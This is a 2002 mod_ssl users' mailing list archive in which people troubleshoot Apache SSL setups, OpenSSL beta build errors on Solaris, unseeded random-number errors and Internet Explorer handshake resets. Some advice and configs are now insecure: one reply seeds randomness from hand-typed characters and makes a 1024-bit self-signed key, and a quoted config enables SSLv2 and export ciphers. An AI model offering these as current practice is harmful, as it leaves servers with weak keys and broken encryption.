 >>> SSLLogLevel info

 >>>

 >>> And this is an example of what =
happens according to the 

SSL log. The

 >>> first

 >>> connection succeeded, the second =
one hung up:

 >>>

 >>> [03/Jun/2002 18:37:03 03630] =
[info]  Connection to 

child 19 established

 >>> (server =
www.astdgoldengate.org:443, client 12.236.195.38)

 >>> [03/Jun/2002 18:37:03 03630] =
[info]  Seeding PRNG with 

136 bytes of

 >>> entropy

 >>> [03/Jun/2002 18:37:03 03630] =
[warn]  Failed to acquire 

global mutex lock

 >>> [03/Jun/2002 18:37:03 03630] =
[warn]  Failed to release 

global mutex lock

 >>> [03/Jun/2002 18:37:03 03630] =
[info]  Connection: Client 

IP:

 >>> 12.236.195.38,

 >>> Protocol: SSLv3, Cipher: RC4-MD5 =
(128/128 bits)

 >>> [03/Jun/2002 18:37:03 03630] =
[info]  Initial (No.1) 

HTTPS request

 >>> received

 >>> for child 19 (server =
www.astdgoldengate.org:443)

 >>> [03/Jun/2002 18:37:19 03630] =
[info]  Connection to 

child 19 closed with

 >>> standard shutdown(server =
www.astdgoldengate.org:443, 

client

 >>> 12.236.195.38)

 >>> [03/Jun/2002 18:40:49 03642] =
[info]  Connection to 

child 25 established

 >>> (server =
www.astdgoldengate.org:443, client 12.236.195.38)

 >>> [03/Jun/2002 18:40:49 03642] =
[info]  Seeding PRNG with 

136 bytes of

 >>> entropy

 >>> [03/Jun/2002 18:40:49 03642] =
[warn]  Failed to acquire 

global mutex lock

 >>> [03/Jun/2002 18:40:49 03642] =
[warn]  Failed to release 

global mutex lock

 >>>

 >>> I'd appreciate any input anyone =
has with a similar 

scenario.

 >>>

 >>> Thanks,

 >>>

 >>> /s/ Harley Puthuff

 >>>

 >>>

 >>>

 >>>

 >>

 >>

 >>

 >>

 >

 >






-- 

.tom






-- 

.tom

_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C20D75.A0642E90--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 23:13:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA18659; Thu, 6 Jun 2002 23:12:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id XAA18619; Thu, 6 Jun 2002 23:11:36 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 2DD224CE767; Thu,  6 Jun 2002 23:11:36 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id AD6D528AC8; Thu,  6 Jun 2002 23:10:44 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from asgaard.wan.cwomnes.net id VAA14917; Thu, 6 Jun 2002 21:59:18 +0200 (MET DST)
Received: from SROMERO1-SNS.smc.sns.slb.com (plan9.wan.omnes.net [192.23.85.25])
	by asgaard.wan.cwomnes.net (8.10.2+Sun/8.10.2) with ESMTP id g56JvWd23865;
	Thu, 6 Jun 2002 14:57:33 -0500 (CDT)
Message-Id: <5.1.1.1.2.20020606143950.04307230@asgaard.wan.cwomnes.net>
X-Sender: sromero@asgaard.wan.cwomnes.net
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Thu, 06 Jun 2002 14:57:28 -0500
To: openssl-users@openssl.org
From: Steve Romero 
Subject: openssl-0.9.7-beta1 testing
Cc: modssl-users@modssl.org
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Romero 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all,

Didn't see a bug list, but wanted to let everyone know that I had problems 
with this beta release under the following conditions:

+ gcc
+ Solaris 8 (patched)
+ rsaref-2.0
+ openssl-0.9.7-beta1

When compiling openssl I get:

evp_test.c: In function `main':
evp_test.c:361: warning: implicit declaration of function `strsep'
evp_test.c:361: warning: passing arg 1 of `atoi' makes pointer from integer 
without a cast
gcc -o evp_test -I.. -I../include  -DOPENSSL_SYSNAME_ULTRASPARC -fPIC 
-DOPENSSL_THREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -DOPENSSL_NO_KRB5 
-fPIC -m32 -mcpu=ultrasparc -O3 -fomit-frame-pointer -Wall -DB_ENDIAN 
-DBN_DIV2W -DMD5_ASM evp_test.o  -L.. -lcrypto 
-L/home/sromero/openssl-0.9.7-beta1/../rsaref-2.0/local/rsaref -lsocket 
-lnsl -ldl
evp_test.o: In function `main':
evp_test.o(.text+0x11bc): undefined reference to `strsep'
collect2: ld returned 1 exit status
make[1]: *** [evp_test] Error 1
make[1]: Leaving directory `/LOG/home/sromero/openssl-0.9.7-beta1/test'
make: *** [sub_all] Error 1

Uh-oh.  I've tried compiling using gcc versions 2.8.1, 2.9.5, and 3.0.3.

I DID successfully compile openssl-0.9.7-stable-SNAP-20020529 using the 
above ingredients.  However when using openssl-0.9.7-stable-SNAP-20020529, 
I ran into trouble compiling apache-1.3.24 with SSL support using the 
following ingredients:

+ gcc (same versions mentioned above)
+ Solaris 8 (patched)
+ rsaref-2.0
+ openssl-0.9.7-stable-SNAP-20020529
+ mm-1.1.3
+ mod_ssl-2.8.8-1.3.24
+ apache-1.3.24

When compiling apache with these ingredients I get:

/include -DMOD_SSL_VERSION=\"2.8.8\" ssl_engine_vars.c && mv 
ssl_engine_vars.o ssl_engine_vars.lo
ssl_engine_vars.c:410: `NID_uniqueIdentifier' undeclared here (not in a 
function)
ssl_engine_vars.c:410: initializer element is not constant
ssl_engine_vars.c:410: (near initialization for 
`ssl_var_lookup_ssl_cert_dn_rec[12].nid')
ssl_engine_vars.c:410: initializer element is not constant
ssl_engine_vars.c:410: (near initialization for 
`ssl_var_lookup_ssl_cert_dn_rec[12]')
ssl_engine_vars.c:411: initializer element is not constant
ssl_engine_vars.c:411: (near initialization for 
`ssl_var_lookup_ssl_cert_dn_rec[13]')
ssl_engine_vars.c:412: initializer element is not constant
ssl_engine_vars.c:412: (near initialization for 
`ssl_var_lookup_ssl_cert_dn_rec[14]')
make[4]: *** [ssl_engine_vars.lo] Error 1
make[3]: *** [all] Error 1
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/LOG/home/sromero/apache_1.3.24/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/LOG/home/sromero/apache_1.3.24'
make: *** [build] Error 2

Oops.  Looks like a compatibility problem with mod_ssl-2.8.8.

Sorry I can't contribute fancy debugging information - I'm just a user.

Maybe I'm doing something wrong.  If not I hope this information leads to a 
quick release of a stable version of openssl-0.9.7.

Regards,
Steve Romero

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  6 23:45:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA20628; Thu, 6 Jun 2002 23:43:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id XAA20542; Thu, 6 Jun 2002 23:42:03 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Thu, 6 Jun 2002 14:37:26 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Thu, 06 Jun 2002 14:36:55 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Thu, 06 Jun 2002 14:36:39 -0700
From: "Jeff Landers" 
To: 
Subject: Newbie with RANDFILE
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id XAA20549
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

OK, I give up. What am I doing wrong? Apache 2.036 trying to on Solaris 8. Everything seems fine during install. egd working. Random file is /var/spool/prngd/pool. Pointed the RANDFILE at the file in openssl.conf. but keep getting the following.

I searched the archives but no luck.

./CA.sh -newca

Making CA certificate ...
Using configuration from /usr/local/ssl/openssl.cnf
unable to load 'random state'
This means that the random number generator has not been seeded
with much random data.
Consider setting the RANDFILE environment variable to point at a file that
'random' data can be kept in (the file will be overwritten).
Generating a 1024 bit RSA private key
10175:error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not seeded:md_rand.c:501:You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
10175:error:04069003:rsa routines:RSA_generate_key:BN lib:rsa_gen.c:182:

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 00:00:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA21340; Thu, 6 Jun 2002 23:59:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hercules.crossthread.com id XAA21315; Thu, 6 Jun 2002 23:58:43 +0200 (MET DST)
Received: from edsasc3k6e5h73 ([199.42.177.225])
	(authenticated)
	by hercules.crossthread.com (8.11.3/8.11.3) with ESMTP id g56MBTv24457
	for ; Thu, 6 Jun 2002 16:11:29 -0600 (MDT)
Message-ID: <002301c20da5$4f300ff0$4329f99f@edsasc3k6e5h73>
From: "Tim Pushor" 
To: 
References: 
Subject: Re: Newbie with RANDFILE
Date: Thu, 6 Jun 2002 15:58:30 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tim Pushor" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Wow, it says right in your error output:

> 10175:error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not
seeded:md_rand.c:501:You need to read the OpenSSL FAQ,
http://www.openssl.org/support/faq.html

And from the FAQ [USER] Section 1:

Pointing $RANDFILE to an Entropy Gathering Daemon socket does not work. Use
the "-rand" option of the OpenSSL command line tools instead.

----- Original Message -----
From: "Jeff Landers" 
To: 
Sent: Thursday, June 06, 2002 3:36 PM
Subject: Newbie with RANDFILE


> OK, I give up. What am I doing wrong? Apache 2.036 trying to on Solaris 8.
Everything seems fine during install. egd working. Random file is
/var/spool/prngd/pool. Pointed the RANDFILE at the file in openssl.conf. but
keep getting the following.
>
> I searched the archives but no luck.
>
> ./CA.sh -newca
>
> Making CA certificate ...
> Using configuration from /usr/local/ssl/openssl.cnf
> unable to load 'random state'
> This means that the random number generator has not been seeded
> with much random data.
> Consider setting the RANDFILE environment variable to point at a file that
> 'random' data can be kept in (the file will be overwritten).
> Generating a 1024 bit RSA private key
> 10175:error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not
seeded:md_rand.c:501:You need to read the OpenSSL FAQ,
http://www.openssl.org/support/faq.html
> 10175:error:04069003:rsa routines:RSA_generate_key:BN lib:rsa_gen.c:182:
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 01:51:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA27996; Fri, 7 Jun 2002 01:50:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from wellington.cnchost.com id BAA27961; Fri, 7 Jun 2002 01:49:34 +0200 (MET DST)
Received: from LAP012 (adsl-66-122-63-139.dsl.sntc01.pacbell.net [66.122.63.139])
	by wellington.cnchost.com
	id TAA19589; Thu, 6 Jun 2002 19:49:32 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Gilles Gros" 
To: 
Subject: RE: handshake problem with IE
Date: Thu, 6 Jun 2002 16:49:31 -0700
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
In-Reply-To: <3CE50DD5.36FF65FD@stockmanagement.de>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Gros" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Have you found anything more on that subject.
I am interested in the result of your research.
We have 4 web servers behind a load balancer, and we receive around 200
of such message a day.
And we have no clue from where it is coming from, and how to fix it.

Gilles

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Heribert Steuer
> Sent: Friday, May 17, 2002 7:04 AM
> To: modssl-users@modssl.org
> Subject: RE: handshake problem with IE
> 
> 
> Dear B. Courtin,
> 
> all the webservers run in local networks and dont pass any other
> machines (like proxies or load balancers).
> the logs show the correct IP of the clients.
> when running non-ssl connections the error doesnt occur at all (same
> machine, same pages, same client).
> I also never discovered this problem using NS4.x
> So im quite sure its a IE problem. Its known that IE is quite crappy
> with https, but there must be a way to solve this.
> Keepalive is turned off for the whole server. So that cannot be the
> problem.
> For completeness i attached the virtualhost config section of the
> httpd.conf
> Any other ideas ?
> 
> Regards,
> Heribert Steuer
> 
> 
> --SNIP!--
> 
> 
>   ServerName    oms.freiburg.peh  # resolved by internal dns
> 
>   SSLEngine on
>   SSLCertificateFile conf/ssl.crt/server.crt
>   SSLCertificateKeyFile conf/ssl.key/server.key
>   
>         SSLOptions +StdEnvVars
>   
> 
> 
> 
>   DocumentRoot  /webroot/peh.internal.net/htdocs
>   ServerAdmin   steuer@stockmanagement.de
>   ScriptAlias   /cgi-bin/ /webroot/peh.internal.net/cgi-bin/
>   ScriptAlias   /perl-bin/ /webroot/peh.internal.net/perl-bin/
>   LogFormat "%V %h %l %u %t \"%r\" %s %b" vcommon
>   CustomLog /webroot/peh.internal.net/logs/access_log vcommon
>   ErrorLog  /webroot/peh.internal.net/logs/error_log
> 
>   SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP
>   
>     Options FollowSymLinks
>     AllowOverride All
>     SetEnvIf User-Agent ".*MSIE.*" \
>              nokeepalive ssl-unclean-shutdown \
>              downgrade-1.0 force-response-1.0
> 
>   
>   
>     SetHandler perl-script
>     PerlHandler Apache::Registry
>     PerlSendHeader On
>     Options ExecCGI
>   
> 
> 
>   # Unauthorized
>   ErrorDocument 401 /error_html/401.html
>   # Payment Required
>   ErrorDocument 402 /error_html/402.html
>   # Forbidden
>   ErrorDocument 403 /error_html/403.html
>   # Not Found
>   ErrorDocument 404 /error_html/404.html
>   # Internal Server Error
>   ErrorDocument 500 /error_html/500.html
> 
> 
> 
> 
> 
> 
> 
> --SNIP!--
> 
> 
> 
> ----Original Message----
> 
> Hi Heribert,
> 
>          are you sure these errors are caused by access/commmunication
> with the Microsoft
>          Internet Explorer 6.0.2600.000? Do they only occour when the
> webserver is accessed by
>          a browser (i.e. MS IE6) or on a regulary basis: are you sure
> your web-servers are not
>          behind any kind of load balancer which is sending "pings" or
> "keepalive" requests to
>          your webserver?
> 
>          Kind regards,
>          B. Courtin
> 
> 
> 
>          -----Original Message-----
>          From: Heribert Steuer [mailto:steuer@stockmanagement.de]
>          Sent: Thursday, May 16, 2002 7:12 PM
>          To: modssl-users@modssl.org
>          Subject: handshake problem with IE
> 
> 
>          Hello everybody,
> 
>          i was already reading the posts on this issue, but all
> suggested tips
>          didnt help at all.
>          server is apache (see version numbers below) running on OpenBSD
> 
>          3.0stable
>          client is Microsoft Internet Explorer 6.0.2600.000 with 128bit
>          encryption
> 
> 
>          the logs say the following  (at least they are full of it):
> 
>          [Thu May 16 18:52:12 2002] [error] mod_ssl: SSL handshake
> interrupted by
>          system [Hint: Stop button pressed in browser?!] (System error
> follows)
>          [Thu May 16 18:52:12 2002] [error] System: Connection reset by
> peer
>          (errno: 54)
> 
> 
>          ssl_engine_log is :
> 
>          [16/May/2002 18:52:13 06053] [info]  Connection to child 0
> established
>          (server cyrus.freiburg.peh:443, client 192.168.30.30)
>          [16/May/2002 18:52:13 06053] [info]  Seeding PRNG with 1160
> bytes of
>          entropy
>          [16/May/2002 18:52:13 06053] [trace] OpenSSL: Handshake: start
>          [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop:
> before/accept
>          initialization
>          [16/May/2002 18:52:13 06053] [debug] OpenSSL: read 11/11 bytes
> from
>          BIO#00A259C0 [mem: 00CCE000] (BIO dump follows)
>          [...]
>          [16/May/2002 18:52:13 06053] [debug] OpenSSL: read 67/67 bytes
> from
>          BIO#00A259C0 [mem: 00CCE00B] (BIO dump follows)
>          [...]
>          [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 read
> client
>          hello A
>          [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write
> server
>          hello A
>          [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write
> 
>          certificate A
>          [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write
> server
>          done A
>          [16/May/2002 18:52:13 06053] [debug] OpenSSL: write 762/762
> bytes to
>          BIO#00A259C0 [mem: 00CA3000] (BIO dump follows)
>          [...]
>          [16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 flush
> data
>          [16/May/2002 18:52:13 06053] [debug] OpenSSL: I/O error, 5
> bytes
>          expected to read on BIO#00A259C0 [mem: 00CCE000]
>          [16/May/2002 18:52:13 06053] [trace] OpenSSL: Exit: error in
> SSLv3 read
>          client certificate A
>          [16/May/2002 18:52:13 06053] [trace] OpenSSL: Exit: error in
> SSLv3 read
>          client certificate A
>          [16/May/2002 18:52:13 06053] [error] SSL handshake interrupted
> by system
>          [Hint: Stop button pressed in browser?!] (System error follows)
> 
>          [16/May/2002 18:52:13 06053] [error] System: Connection reset
> by peer
>          (errno: 54)
> 
> 
> 
>          OpenSSL 0.9.6b [engine] 9 Jul 2001
>          mod_ssl version 2.8
>          mod_perl-1.26
> 
>          Server version: Apache/1.3.19 (Unix)
>          Server built:   Oct 15 2001 11:48:41
>          Server's Module Magic Number: 19990320:10
>          Server compiled with....
>           -D EAPI
>           -D HAVE_MMAP
>           -D HAVE_SHMGET
>           -D USE_MMAP_SCOREBOARD
>           -D USE_MMAP_FILES
>           -D USE_FLOCK_SERIALIZED_ACCEPT
>           -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
>           -D HTTPD_ROOT="/var/www"
>           -D SUEXEC_BIN="/usr/sbin/suexec"
>           -D DEFAULT_PIDLOG="logs/httpd.pid"
>           -D DEFAULT_SCOREBOARD="logs/httpd.scoreboard"
>           -D DEFAULT_LOCKFILE="logs/httpd.lock"
>           -D DEFAULT_XFERLOG="logs/access_log"
>           -D DEFAULT_ERRORLOG="logs/error_log"
>           -D TYPES_CONFIG_FILE="conf/mime.types"
>           -D SERVER_CONFIG_FILE="conf/httpd.conf"
>           -D ACCESS_CONFIG_FILE="conf/access.conf"
>           -D RESOURCE_CONFIG_FILE="conf/srm.conf"
> 
> 
>          if theres a need for more details, just let me know. this
> problem occurs
>          on 3 different machines
>          (all running OpenBSD with different versions of apache/mod_ssl)
> 
>          i hope someone can help.
> 
> 
>          thanks in advance
> 
>          Heribert Steuer
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 02:42:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA00837; Fri, 7 Jun 2002 02:41:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id CAA00809; Fri, 7 Jun 2002 02:40:19 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Thu, 6 Jun 2002 17:40:43 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Thu, 06 Jun 2002 17:40:12 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Thu, 06 Jun 2002 17:40:02 -0700
From: "Jeff Landers" 
To: 
Subject: startssl newbie problem
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id CAA00831
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thank you for the help on the rand file. Next problem is

apache 2.036 with openssl 0.9.6c


../bin/apachectl startssl
[Thu Jun 06 18:20:51 2002] [crit] [Thu Jun 06 18:20:51 2002] file vhost.c, line 232, assertion "rv == APR_SUCCESS" failed


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 09:06:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA18639; Fri, 7 Jun 2002 09:05:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA18586; Fri, 7 Jun 2002 09:04:04 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 78FF94CE726; Fri,  7 Jun 2002 09:04:04 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 55BBD28AC8; Fri,  7 Jun 2002 09:01:16 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from grn.georet.net id XAA21202; Thu, 6 Jun 2002 23:55:51 +0200 (MET DST)
Received: from achan (yoshi_internal.georet.net [209.190.97.158])
	by grn.georet.net (8.11.0/8.11.0) with SMTP id g56LtjC11228
	for ; Thu, 6 Jun 2002 17:55:45 -0400
Message-ID: <033e01c20da5$1cec2c40$1601020a@georet.net>
From: "James L. Morris" 
To: 
References: 
Subject: Re: Newbie with RANDFILE
Date: Thu, 6 Jun 2002 17:57:11 -0400
Organization: Georetiary Networks, Inc.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "James L. Morris" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I just went went through this!

It may have to do with the fact that Solaris 8 and below does not have
support for random number generation.
http://wwws.sun.com/software/solaris/fcc/fcc.html

After several hours of frustration, I found some instructions that work!
I'll save you some grief:

You must install Openssl if you have not already.  I'm using
OpenSSL 0.9.6c 21 dec 2001.

Openssl would normally be installed in /usr/local ... be sure and
update your $PATH to include /usr/local/ssl/bin.

While in /usr/local/ssl/misc:

1.  Using vi, create file named rand.text
        (just a text file with 5 or so lines of random characters).
2.  openssl des3 -in rand.text -out rand.dat
3.  openssl genrsa -des3 -out server.key 1024
4.  openssl req -new -key server.key -out server.csr
5.  openssl x509 -req -days 365 -in server.csr -signkey
        server.key -out server.crt
6.  I used the ssl.conf file to start with (cp ssl.conf httpd.conf)
7.  add User nobody Group nobody to httpd.conf
8.  point SSLCertificateFile and SSLCertificateKeyFile to appropriate path
in the httpd.conf file
9.  ./apachectl startssl

It worked for me.  Let me know how it goes.

Thanks
Jim



----- Original Message -----
From: "Jeff Landers" 
To: 
Sent: Thursday, June 06, 2002 5:36 PM
Subject: Newbie with RANDFILE


> OK, I give up. What am I doing wrong? Apache 2.036 trying to on Solaris 8.
Everything seems fine during install. egd working. Random file is
/var/spool/prngd/pool. Pointed the RANDFILE at the file in openssl.conf. but
keep getting the following.
>
> I searched the archives but no luck.
>
> ./CA.sh -newca
>
> Making CA certificate ...
> Using configuration from /usr/local/ssl/openssl.cnf
> unable to load 'random state'
> This means that the random number generator has not been seeded
> with much random data.
> Consider setting the RANDFILE environment variable to point at a file that
> 'random' data can be kept in (the file will be overwritten).
> Generating a 1024 bit RSA private key
> 10175:error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not
seeded:md_rand.c:501:You need to read the OpenSSL FAQ,
http://www.openssl.org/support/faq.html
> 10175:error:04069003:rsa routines:RSA_generate_key:BN lib:rsa_gen.c:182:
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 09:12:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA19492; Fri, 7 Jun 2002 09:11:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id JAA19455; Fri, 7 Jun 2002 09:10:39 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP
	id 7E846204A; Fri,  7 Jun 2002 09:10:38 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 272F32048; Fri,  7 Jun 2002 09:10:36 +0200 (METDST)
Date: Fri, 7 Jun 2002 09:10:35 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Cc: openssl-users@openssl.org
Subject: Re: openssl-0.9.7-beta1 testing
Message-ID: <20020607071035.GB4181@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org, openssl-users@openssl.org
References: <5.1.1.1.2.20020606143950.04307230@asgaard.wan.cwomnes.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <5.1.1.1.2.20020606143950.04307230@asgaard.wan.cwomnes.net>
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, Jun 06, 2002 at 02:57:28PM -0500, Steve Romero wrote:
> Didn't see a bug list, but wanted to let everyone know that I had problems 
> with this beta release under the following conditions:
> 
> + gcc
> + Solaris 8 (patched)
> + rsaref-2.0
> + openssl-0.9.7-beta1
> 
> When compiling openssl I get:
> 
> evp_test.c: In function `main':
> evp_test.c:361: warning: implicit declaration of function `strsep'
> evp_test.c:361: warning: passing arg 1 of `atoi' makes pointer from integer 
> without a cast
> gcc -o evp_test -I.. -I../include  -DOPENSSL_SYSNAME_ULTRASPARC -fPIC 
> -DOPENSSL_THREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -DOPENSSL_NO_KRB5 
> -fPIC -m32 -mcpu=ultrasparc -O3 -fomit-frame-pointer -Wall -DB_ENDIAN 
> -DBN_DIV2W -DMD5_ASM evp_test.o  -L.. -lcrypto 
> -L/home/sromero/openssl-0.9.7-beta1/../rsaref-2.0/local/rsaref -lsocket 
> -lnsl -ldl
> evp_test.o: In function `main':
> evp_test.o(.text+0x11bc): undefined reference to `strsep'
> collect2: ld returned 1 exit status
> make[1]: *** [evp_test] Error 1
> make[1]: Leaving directory `/LOG/home/sromero/openssl-0.9.7-beta1/test'
> make: *** [sub_all] Error 1

This bug has been fixed since the release of OpenSSL-0.9.7-beta1.
Beta2 will be released soon.

> + gcc (same versions mentioned above)
> + Solaris 8 (patched)
> + rsaref-2.0
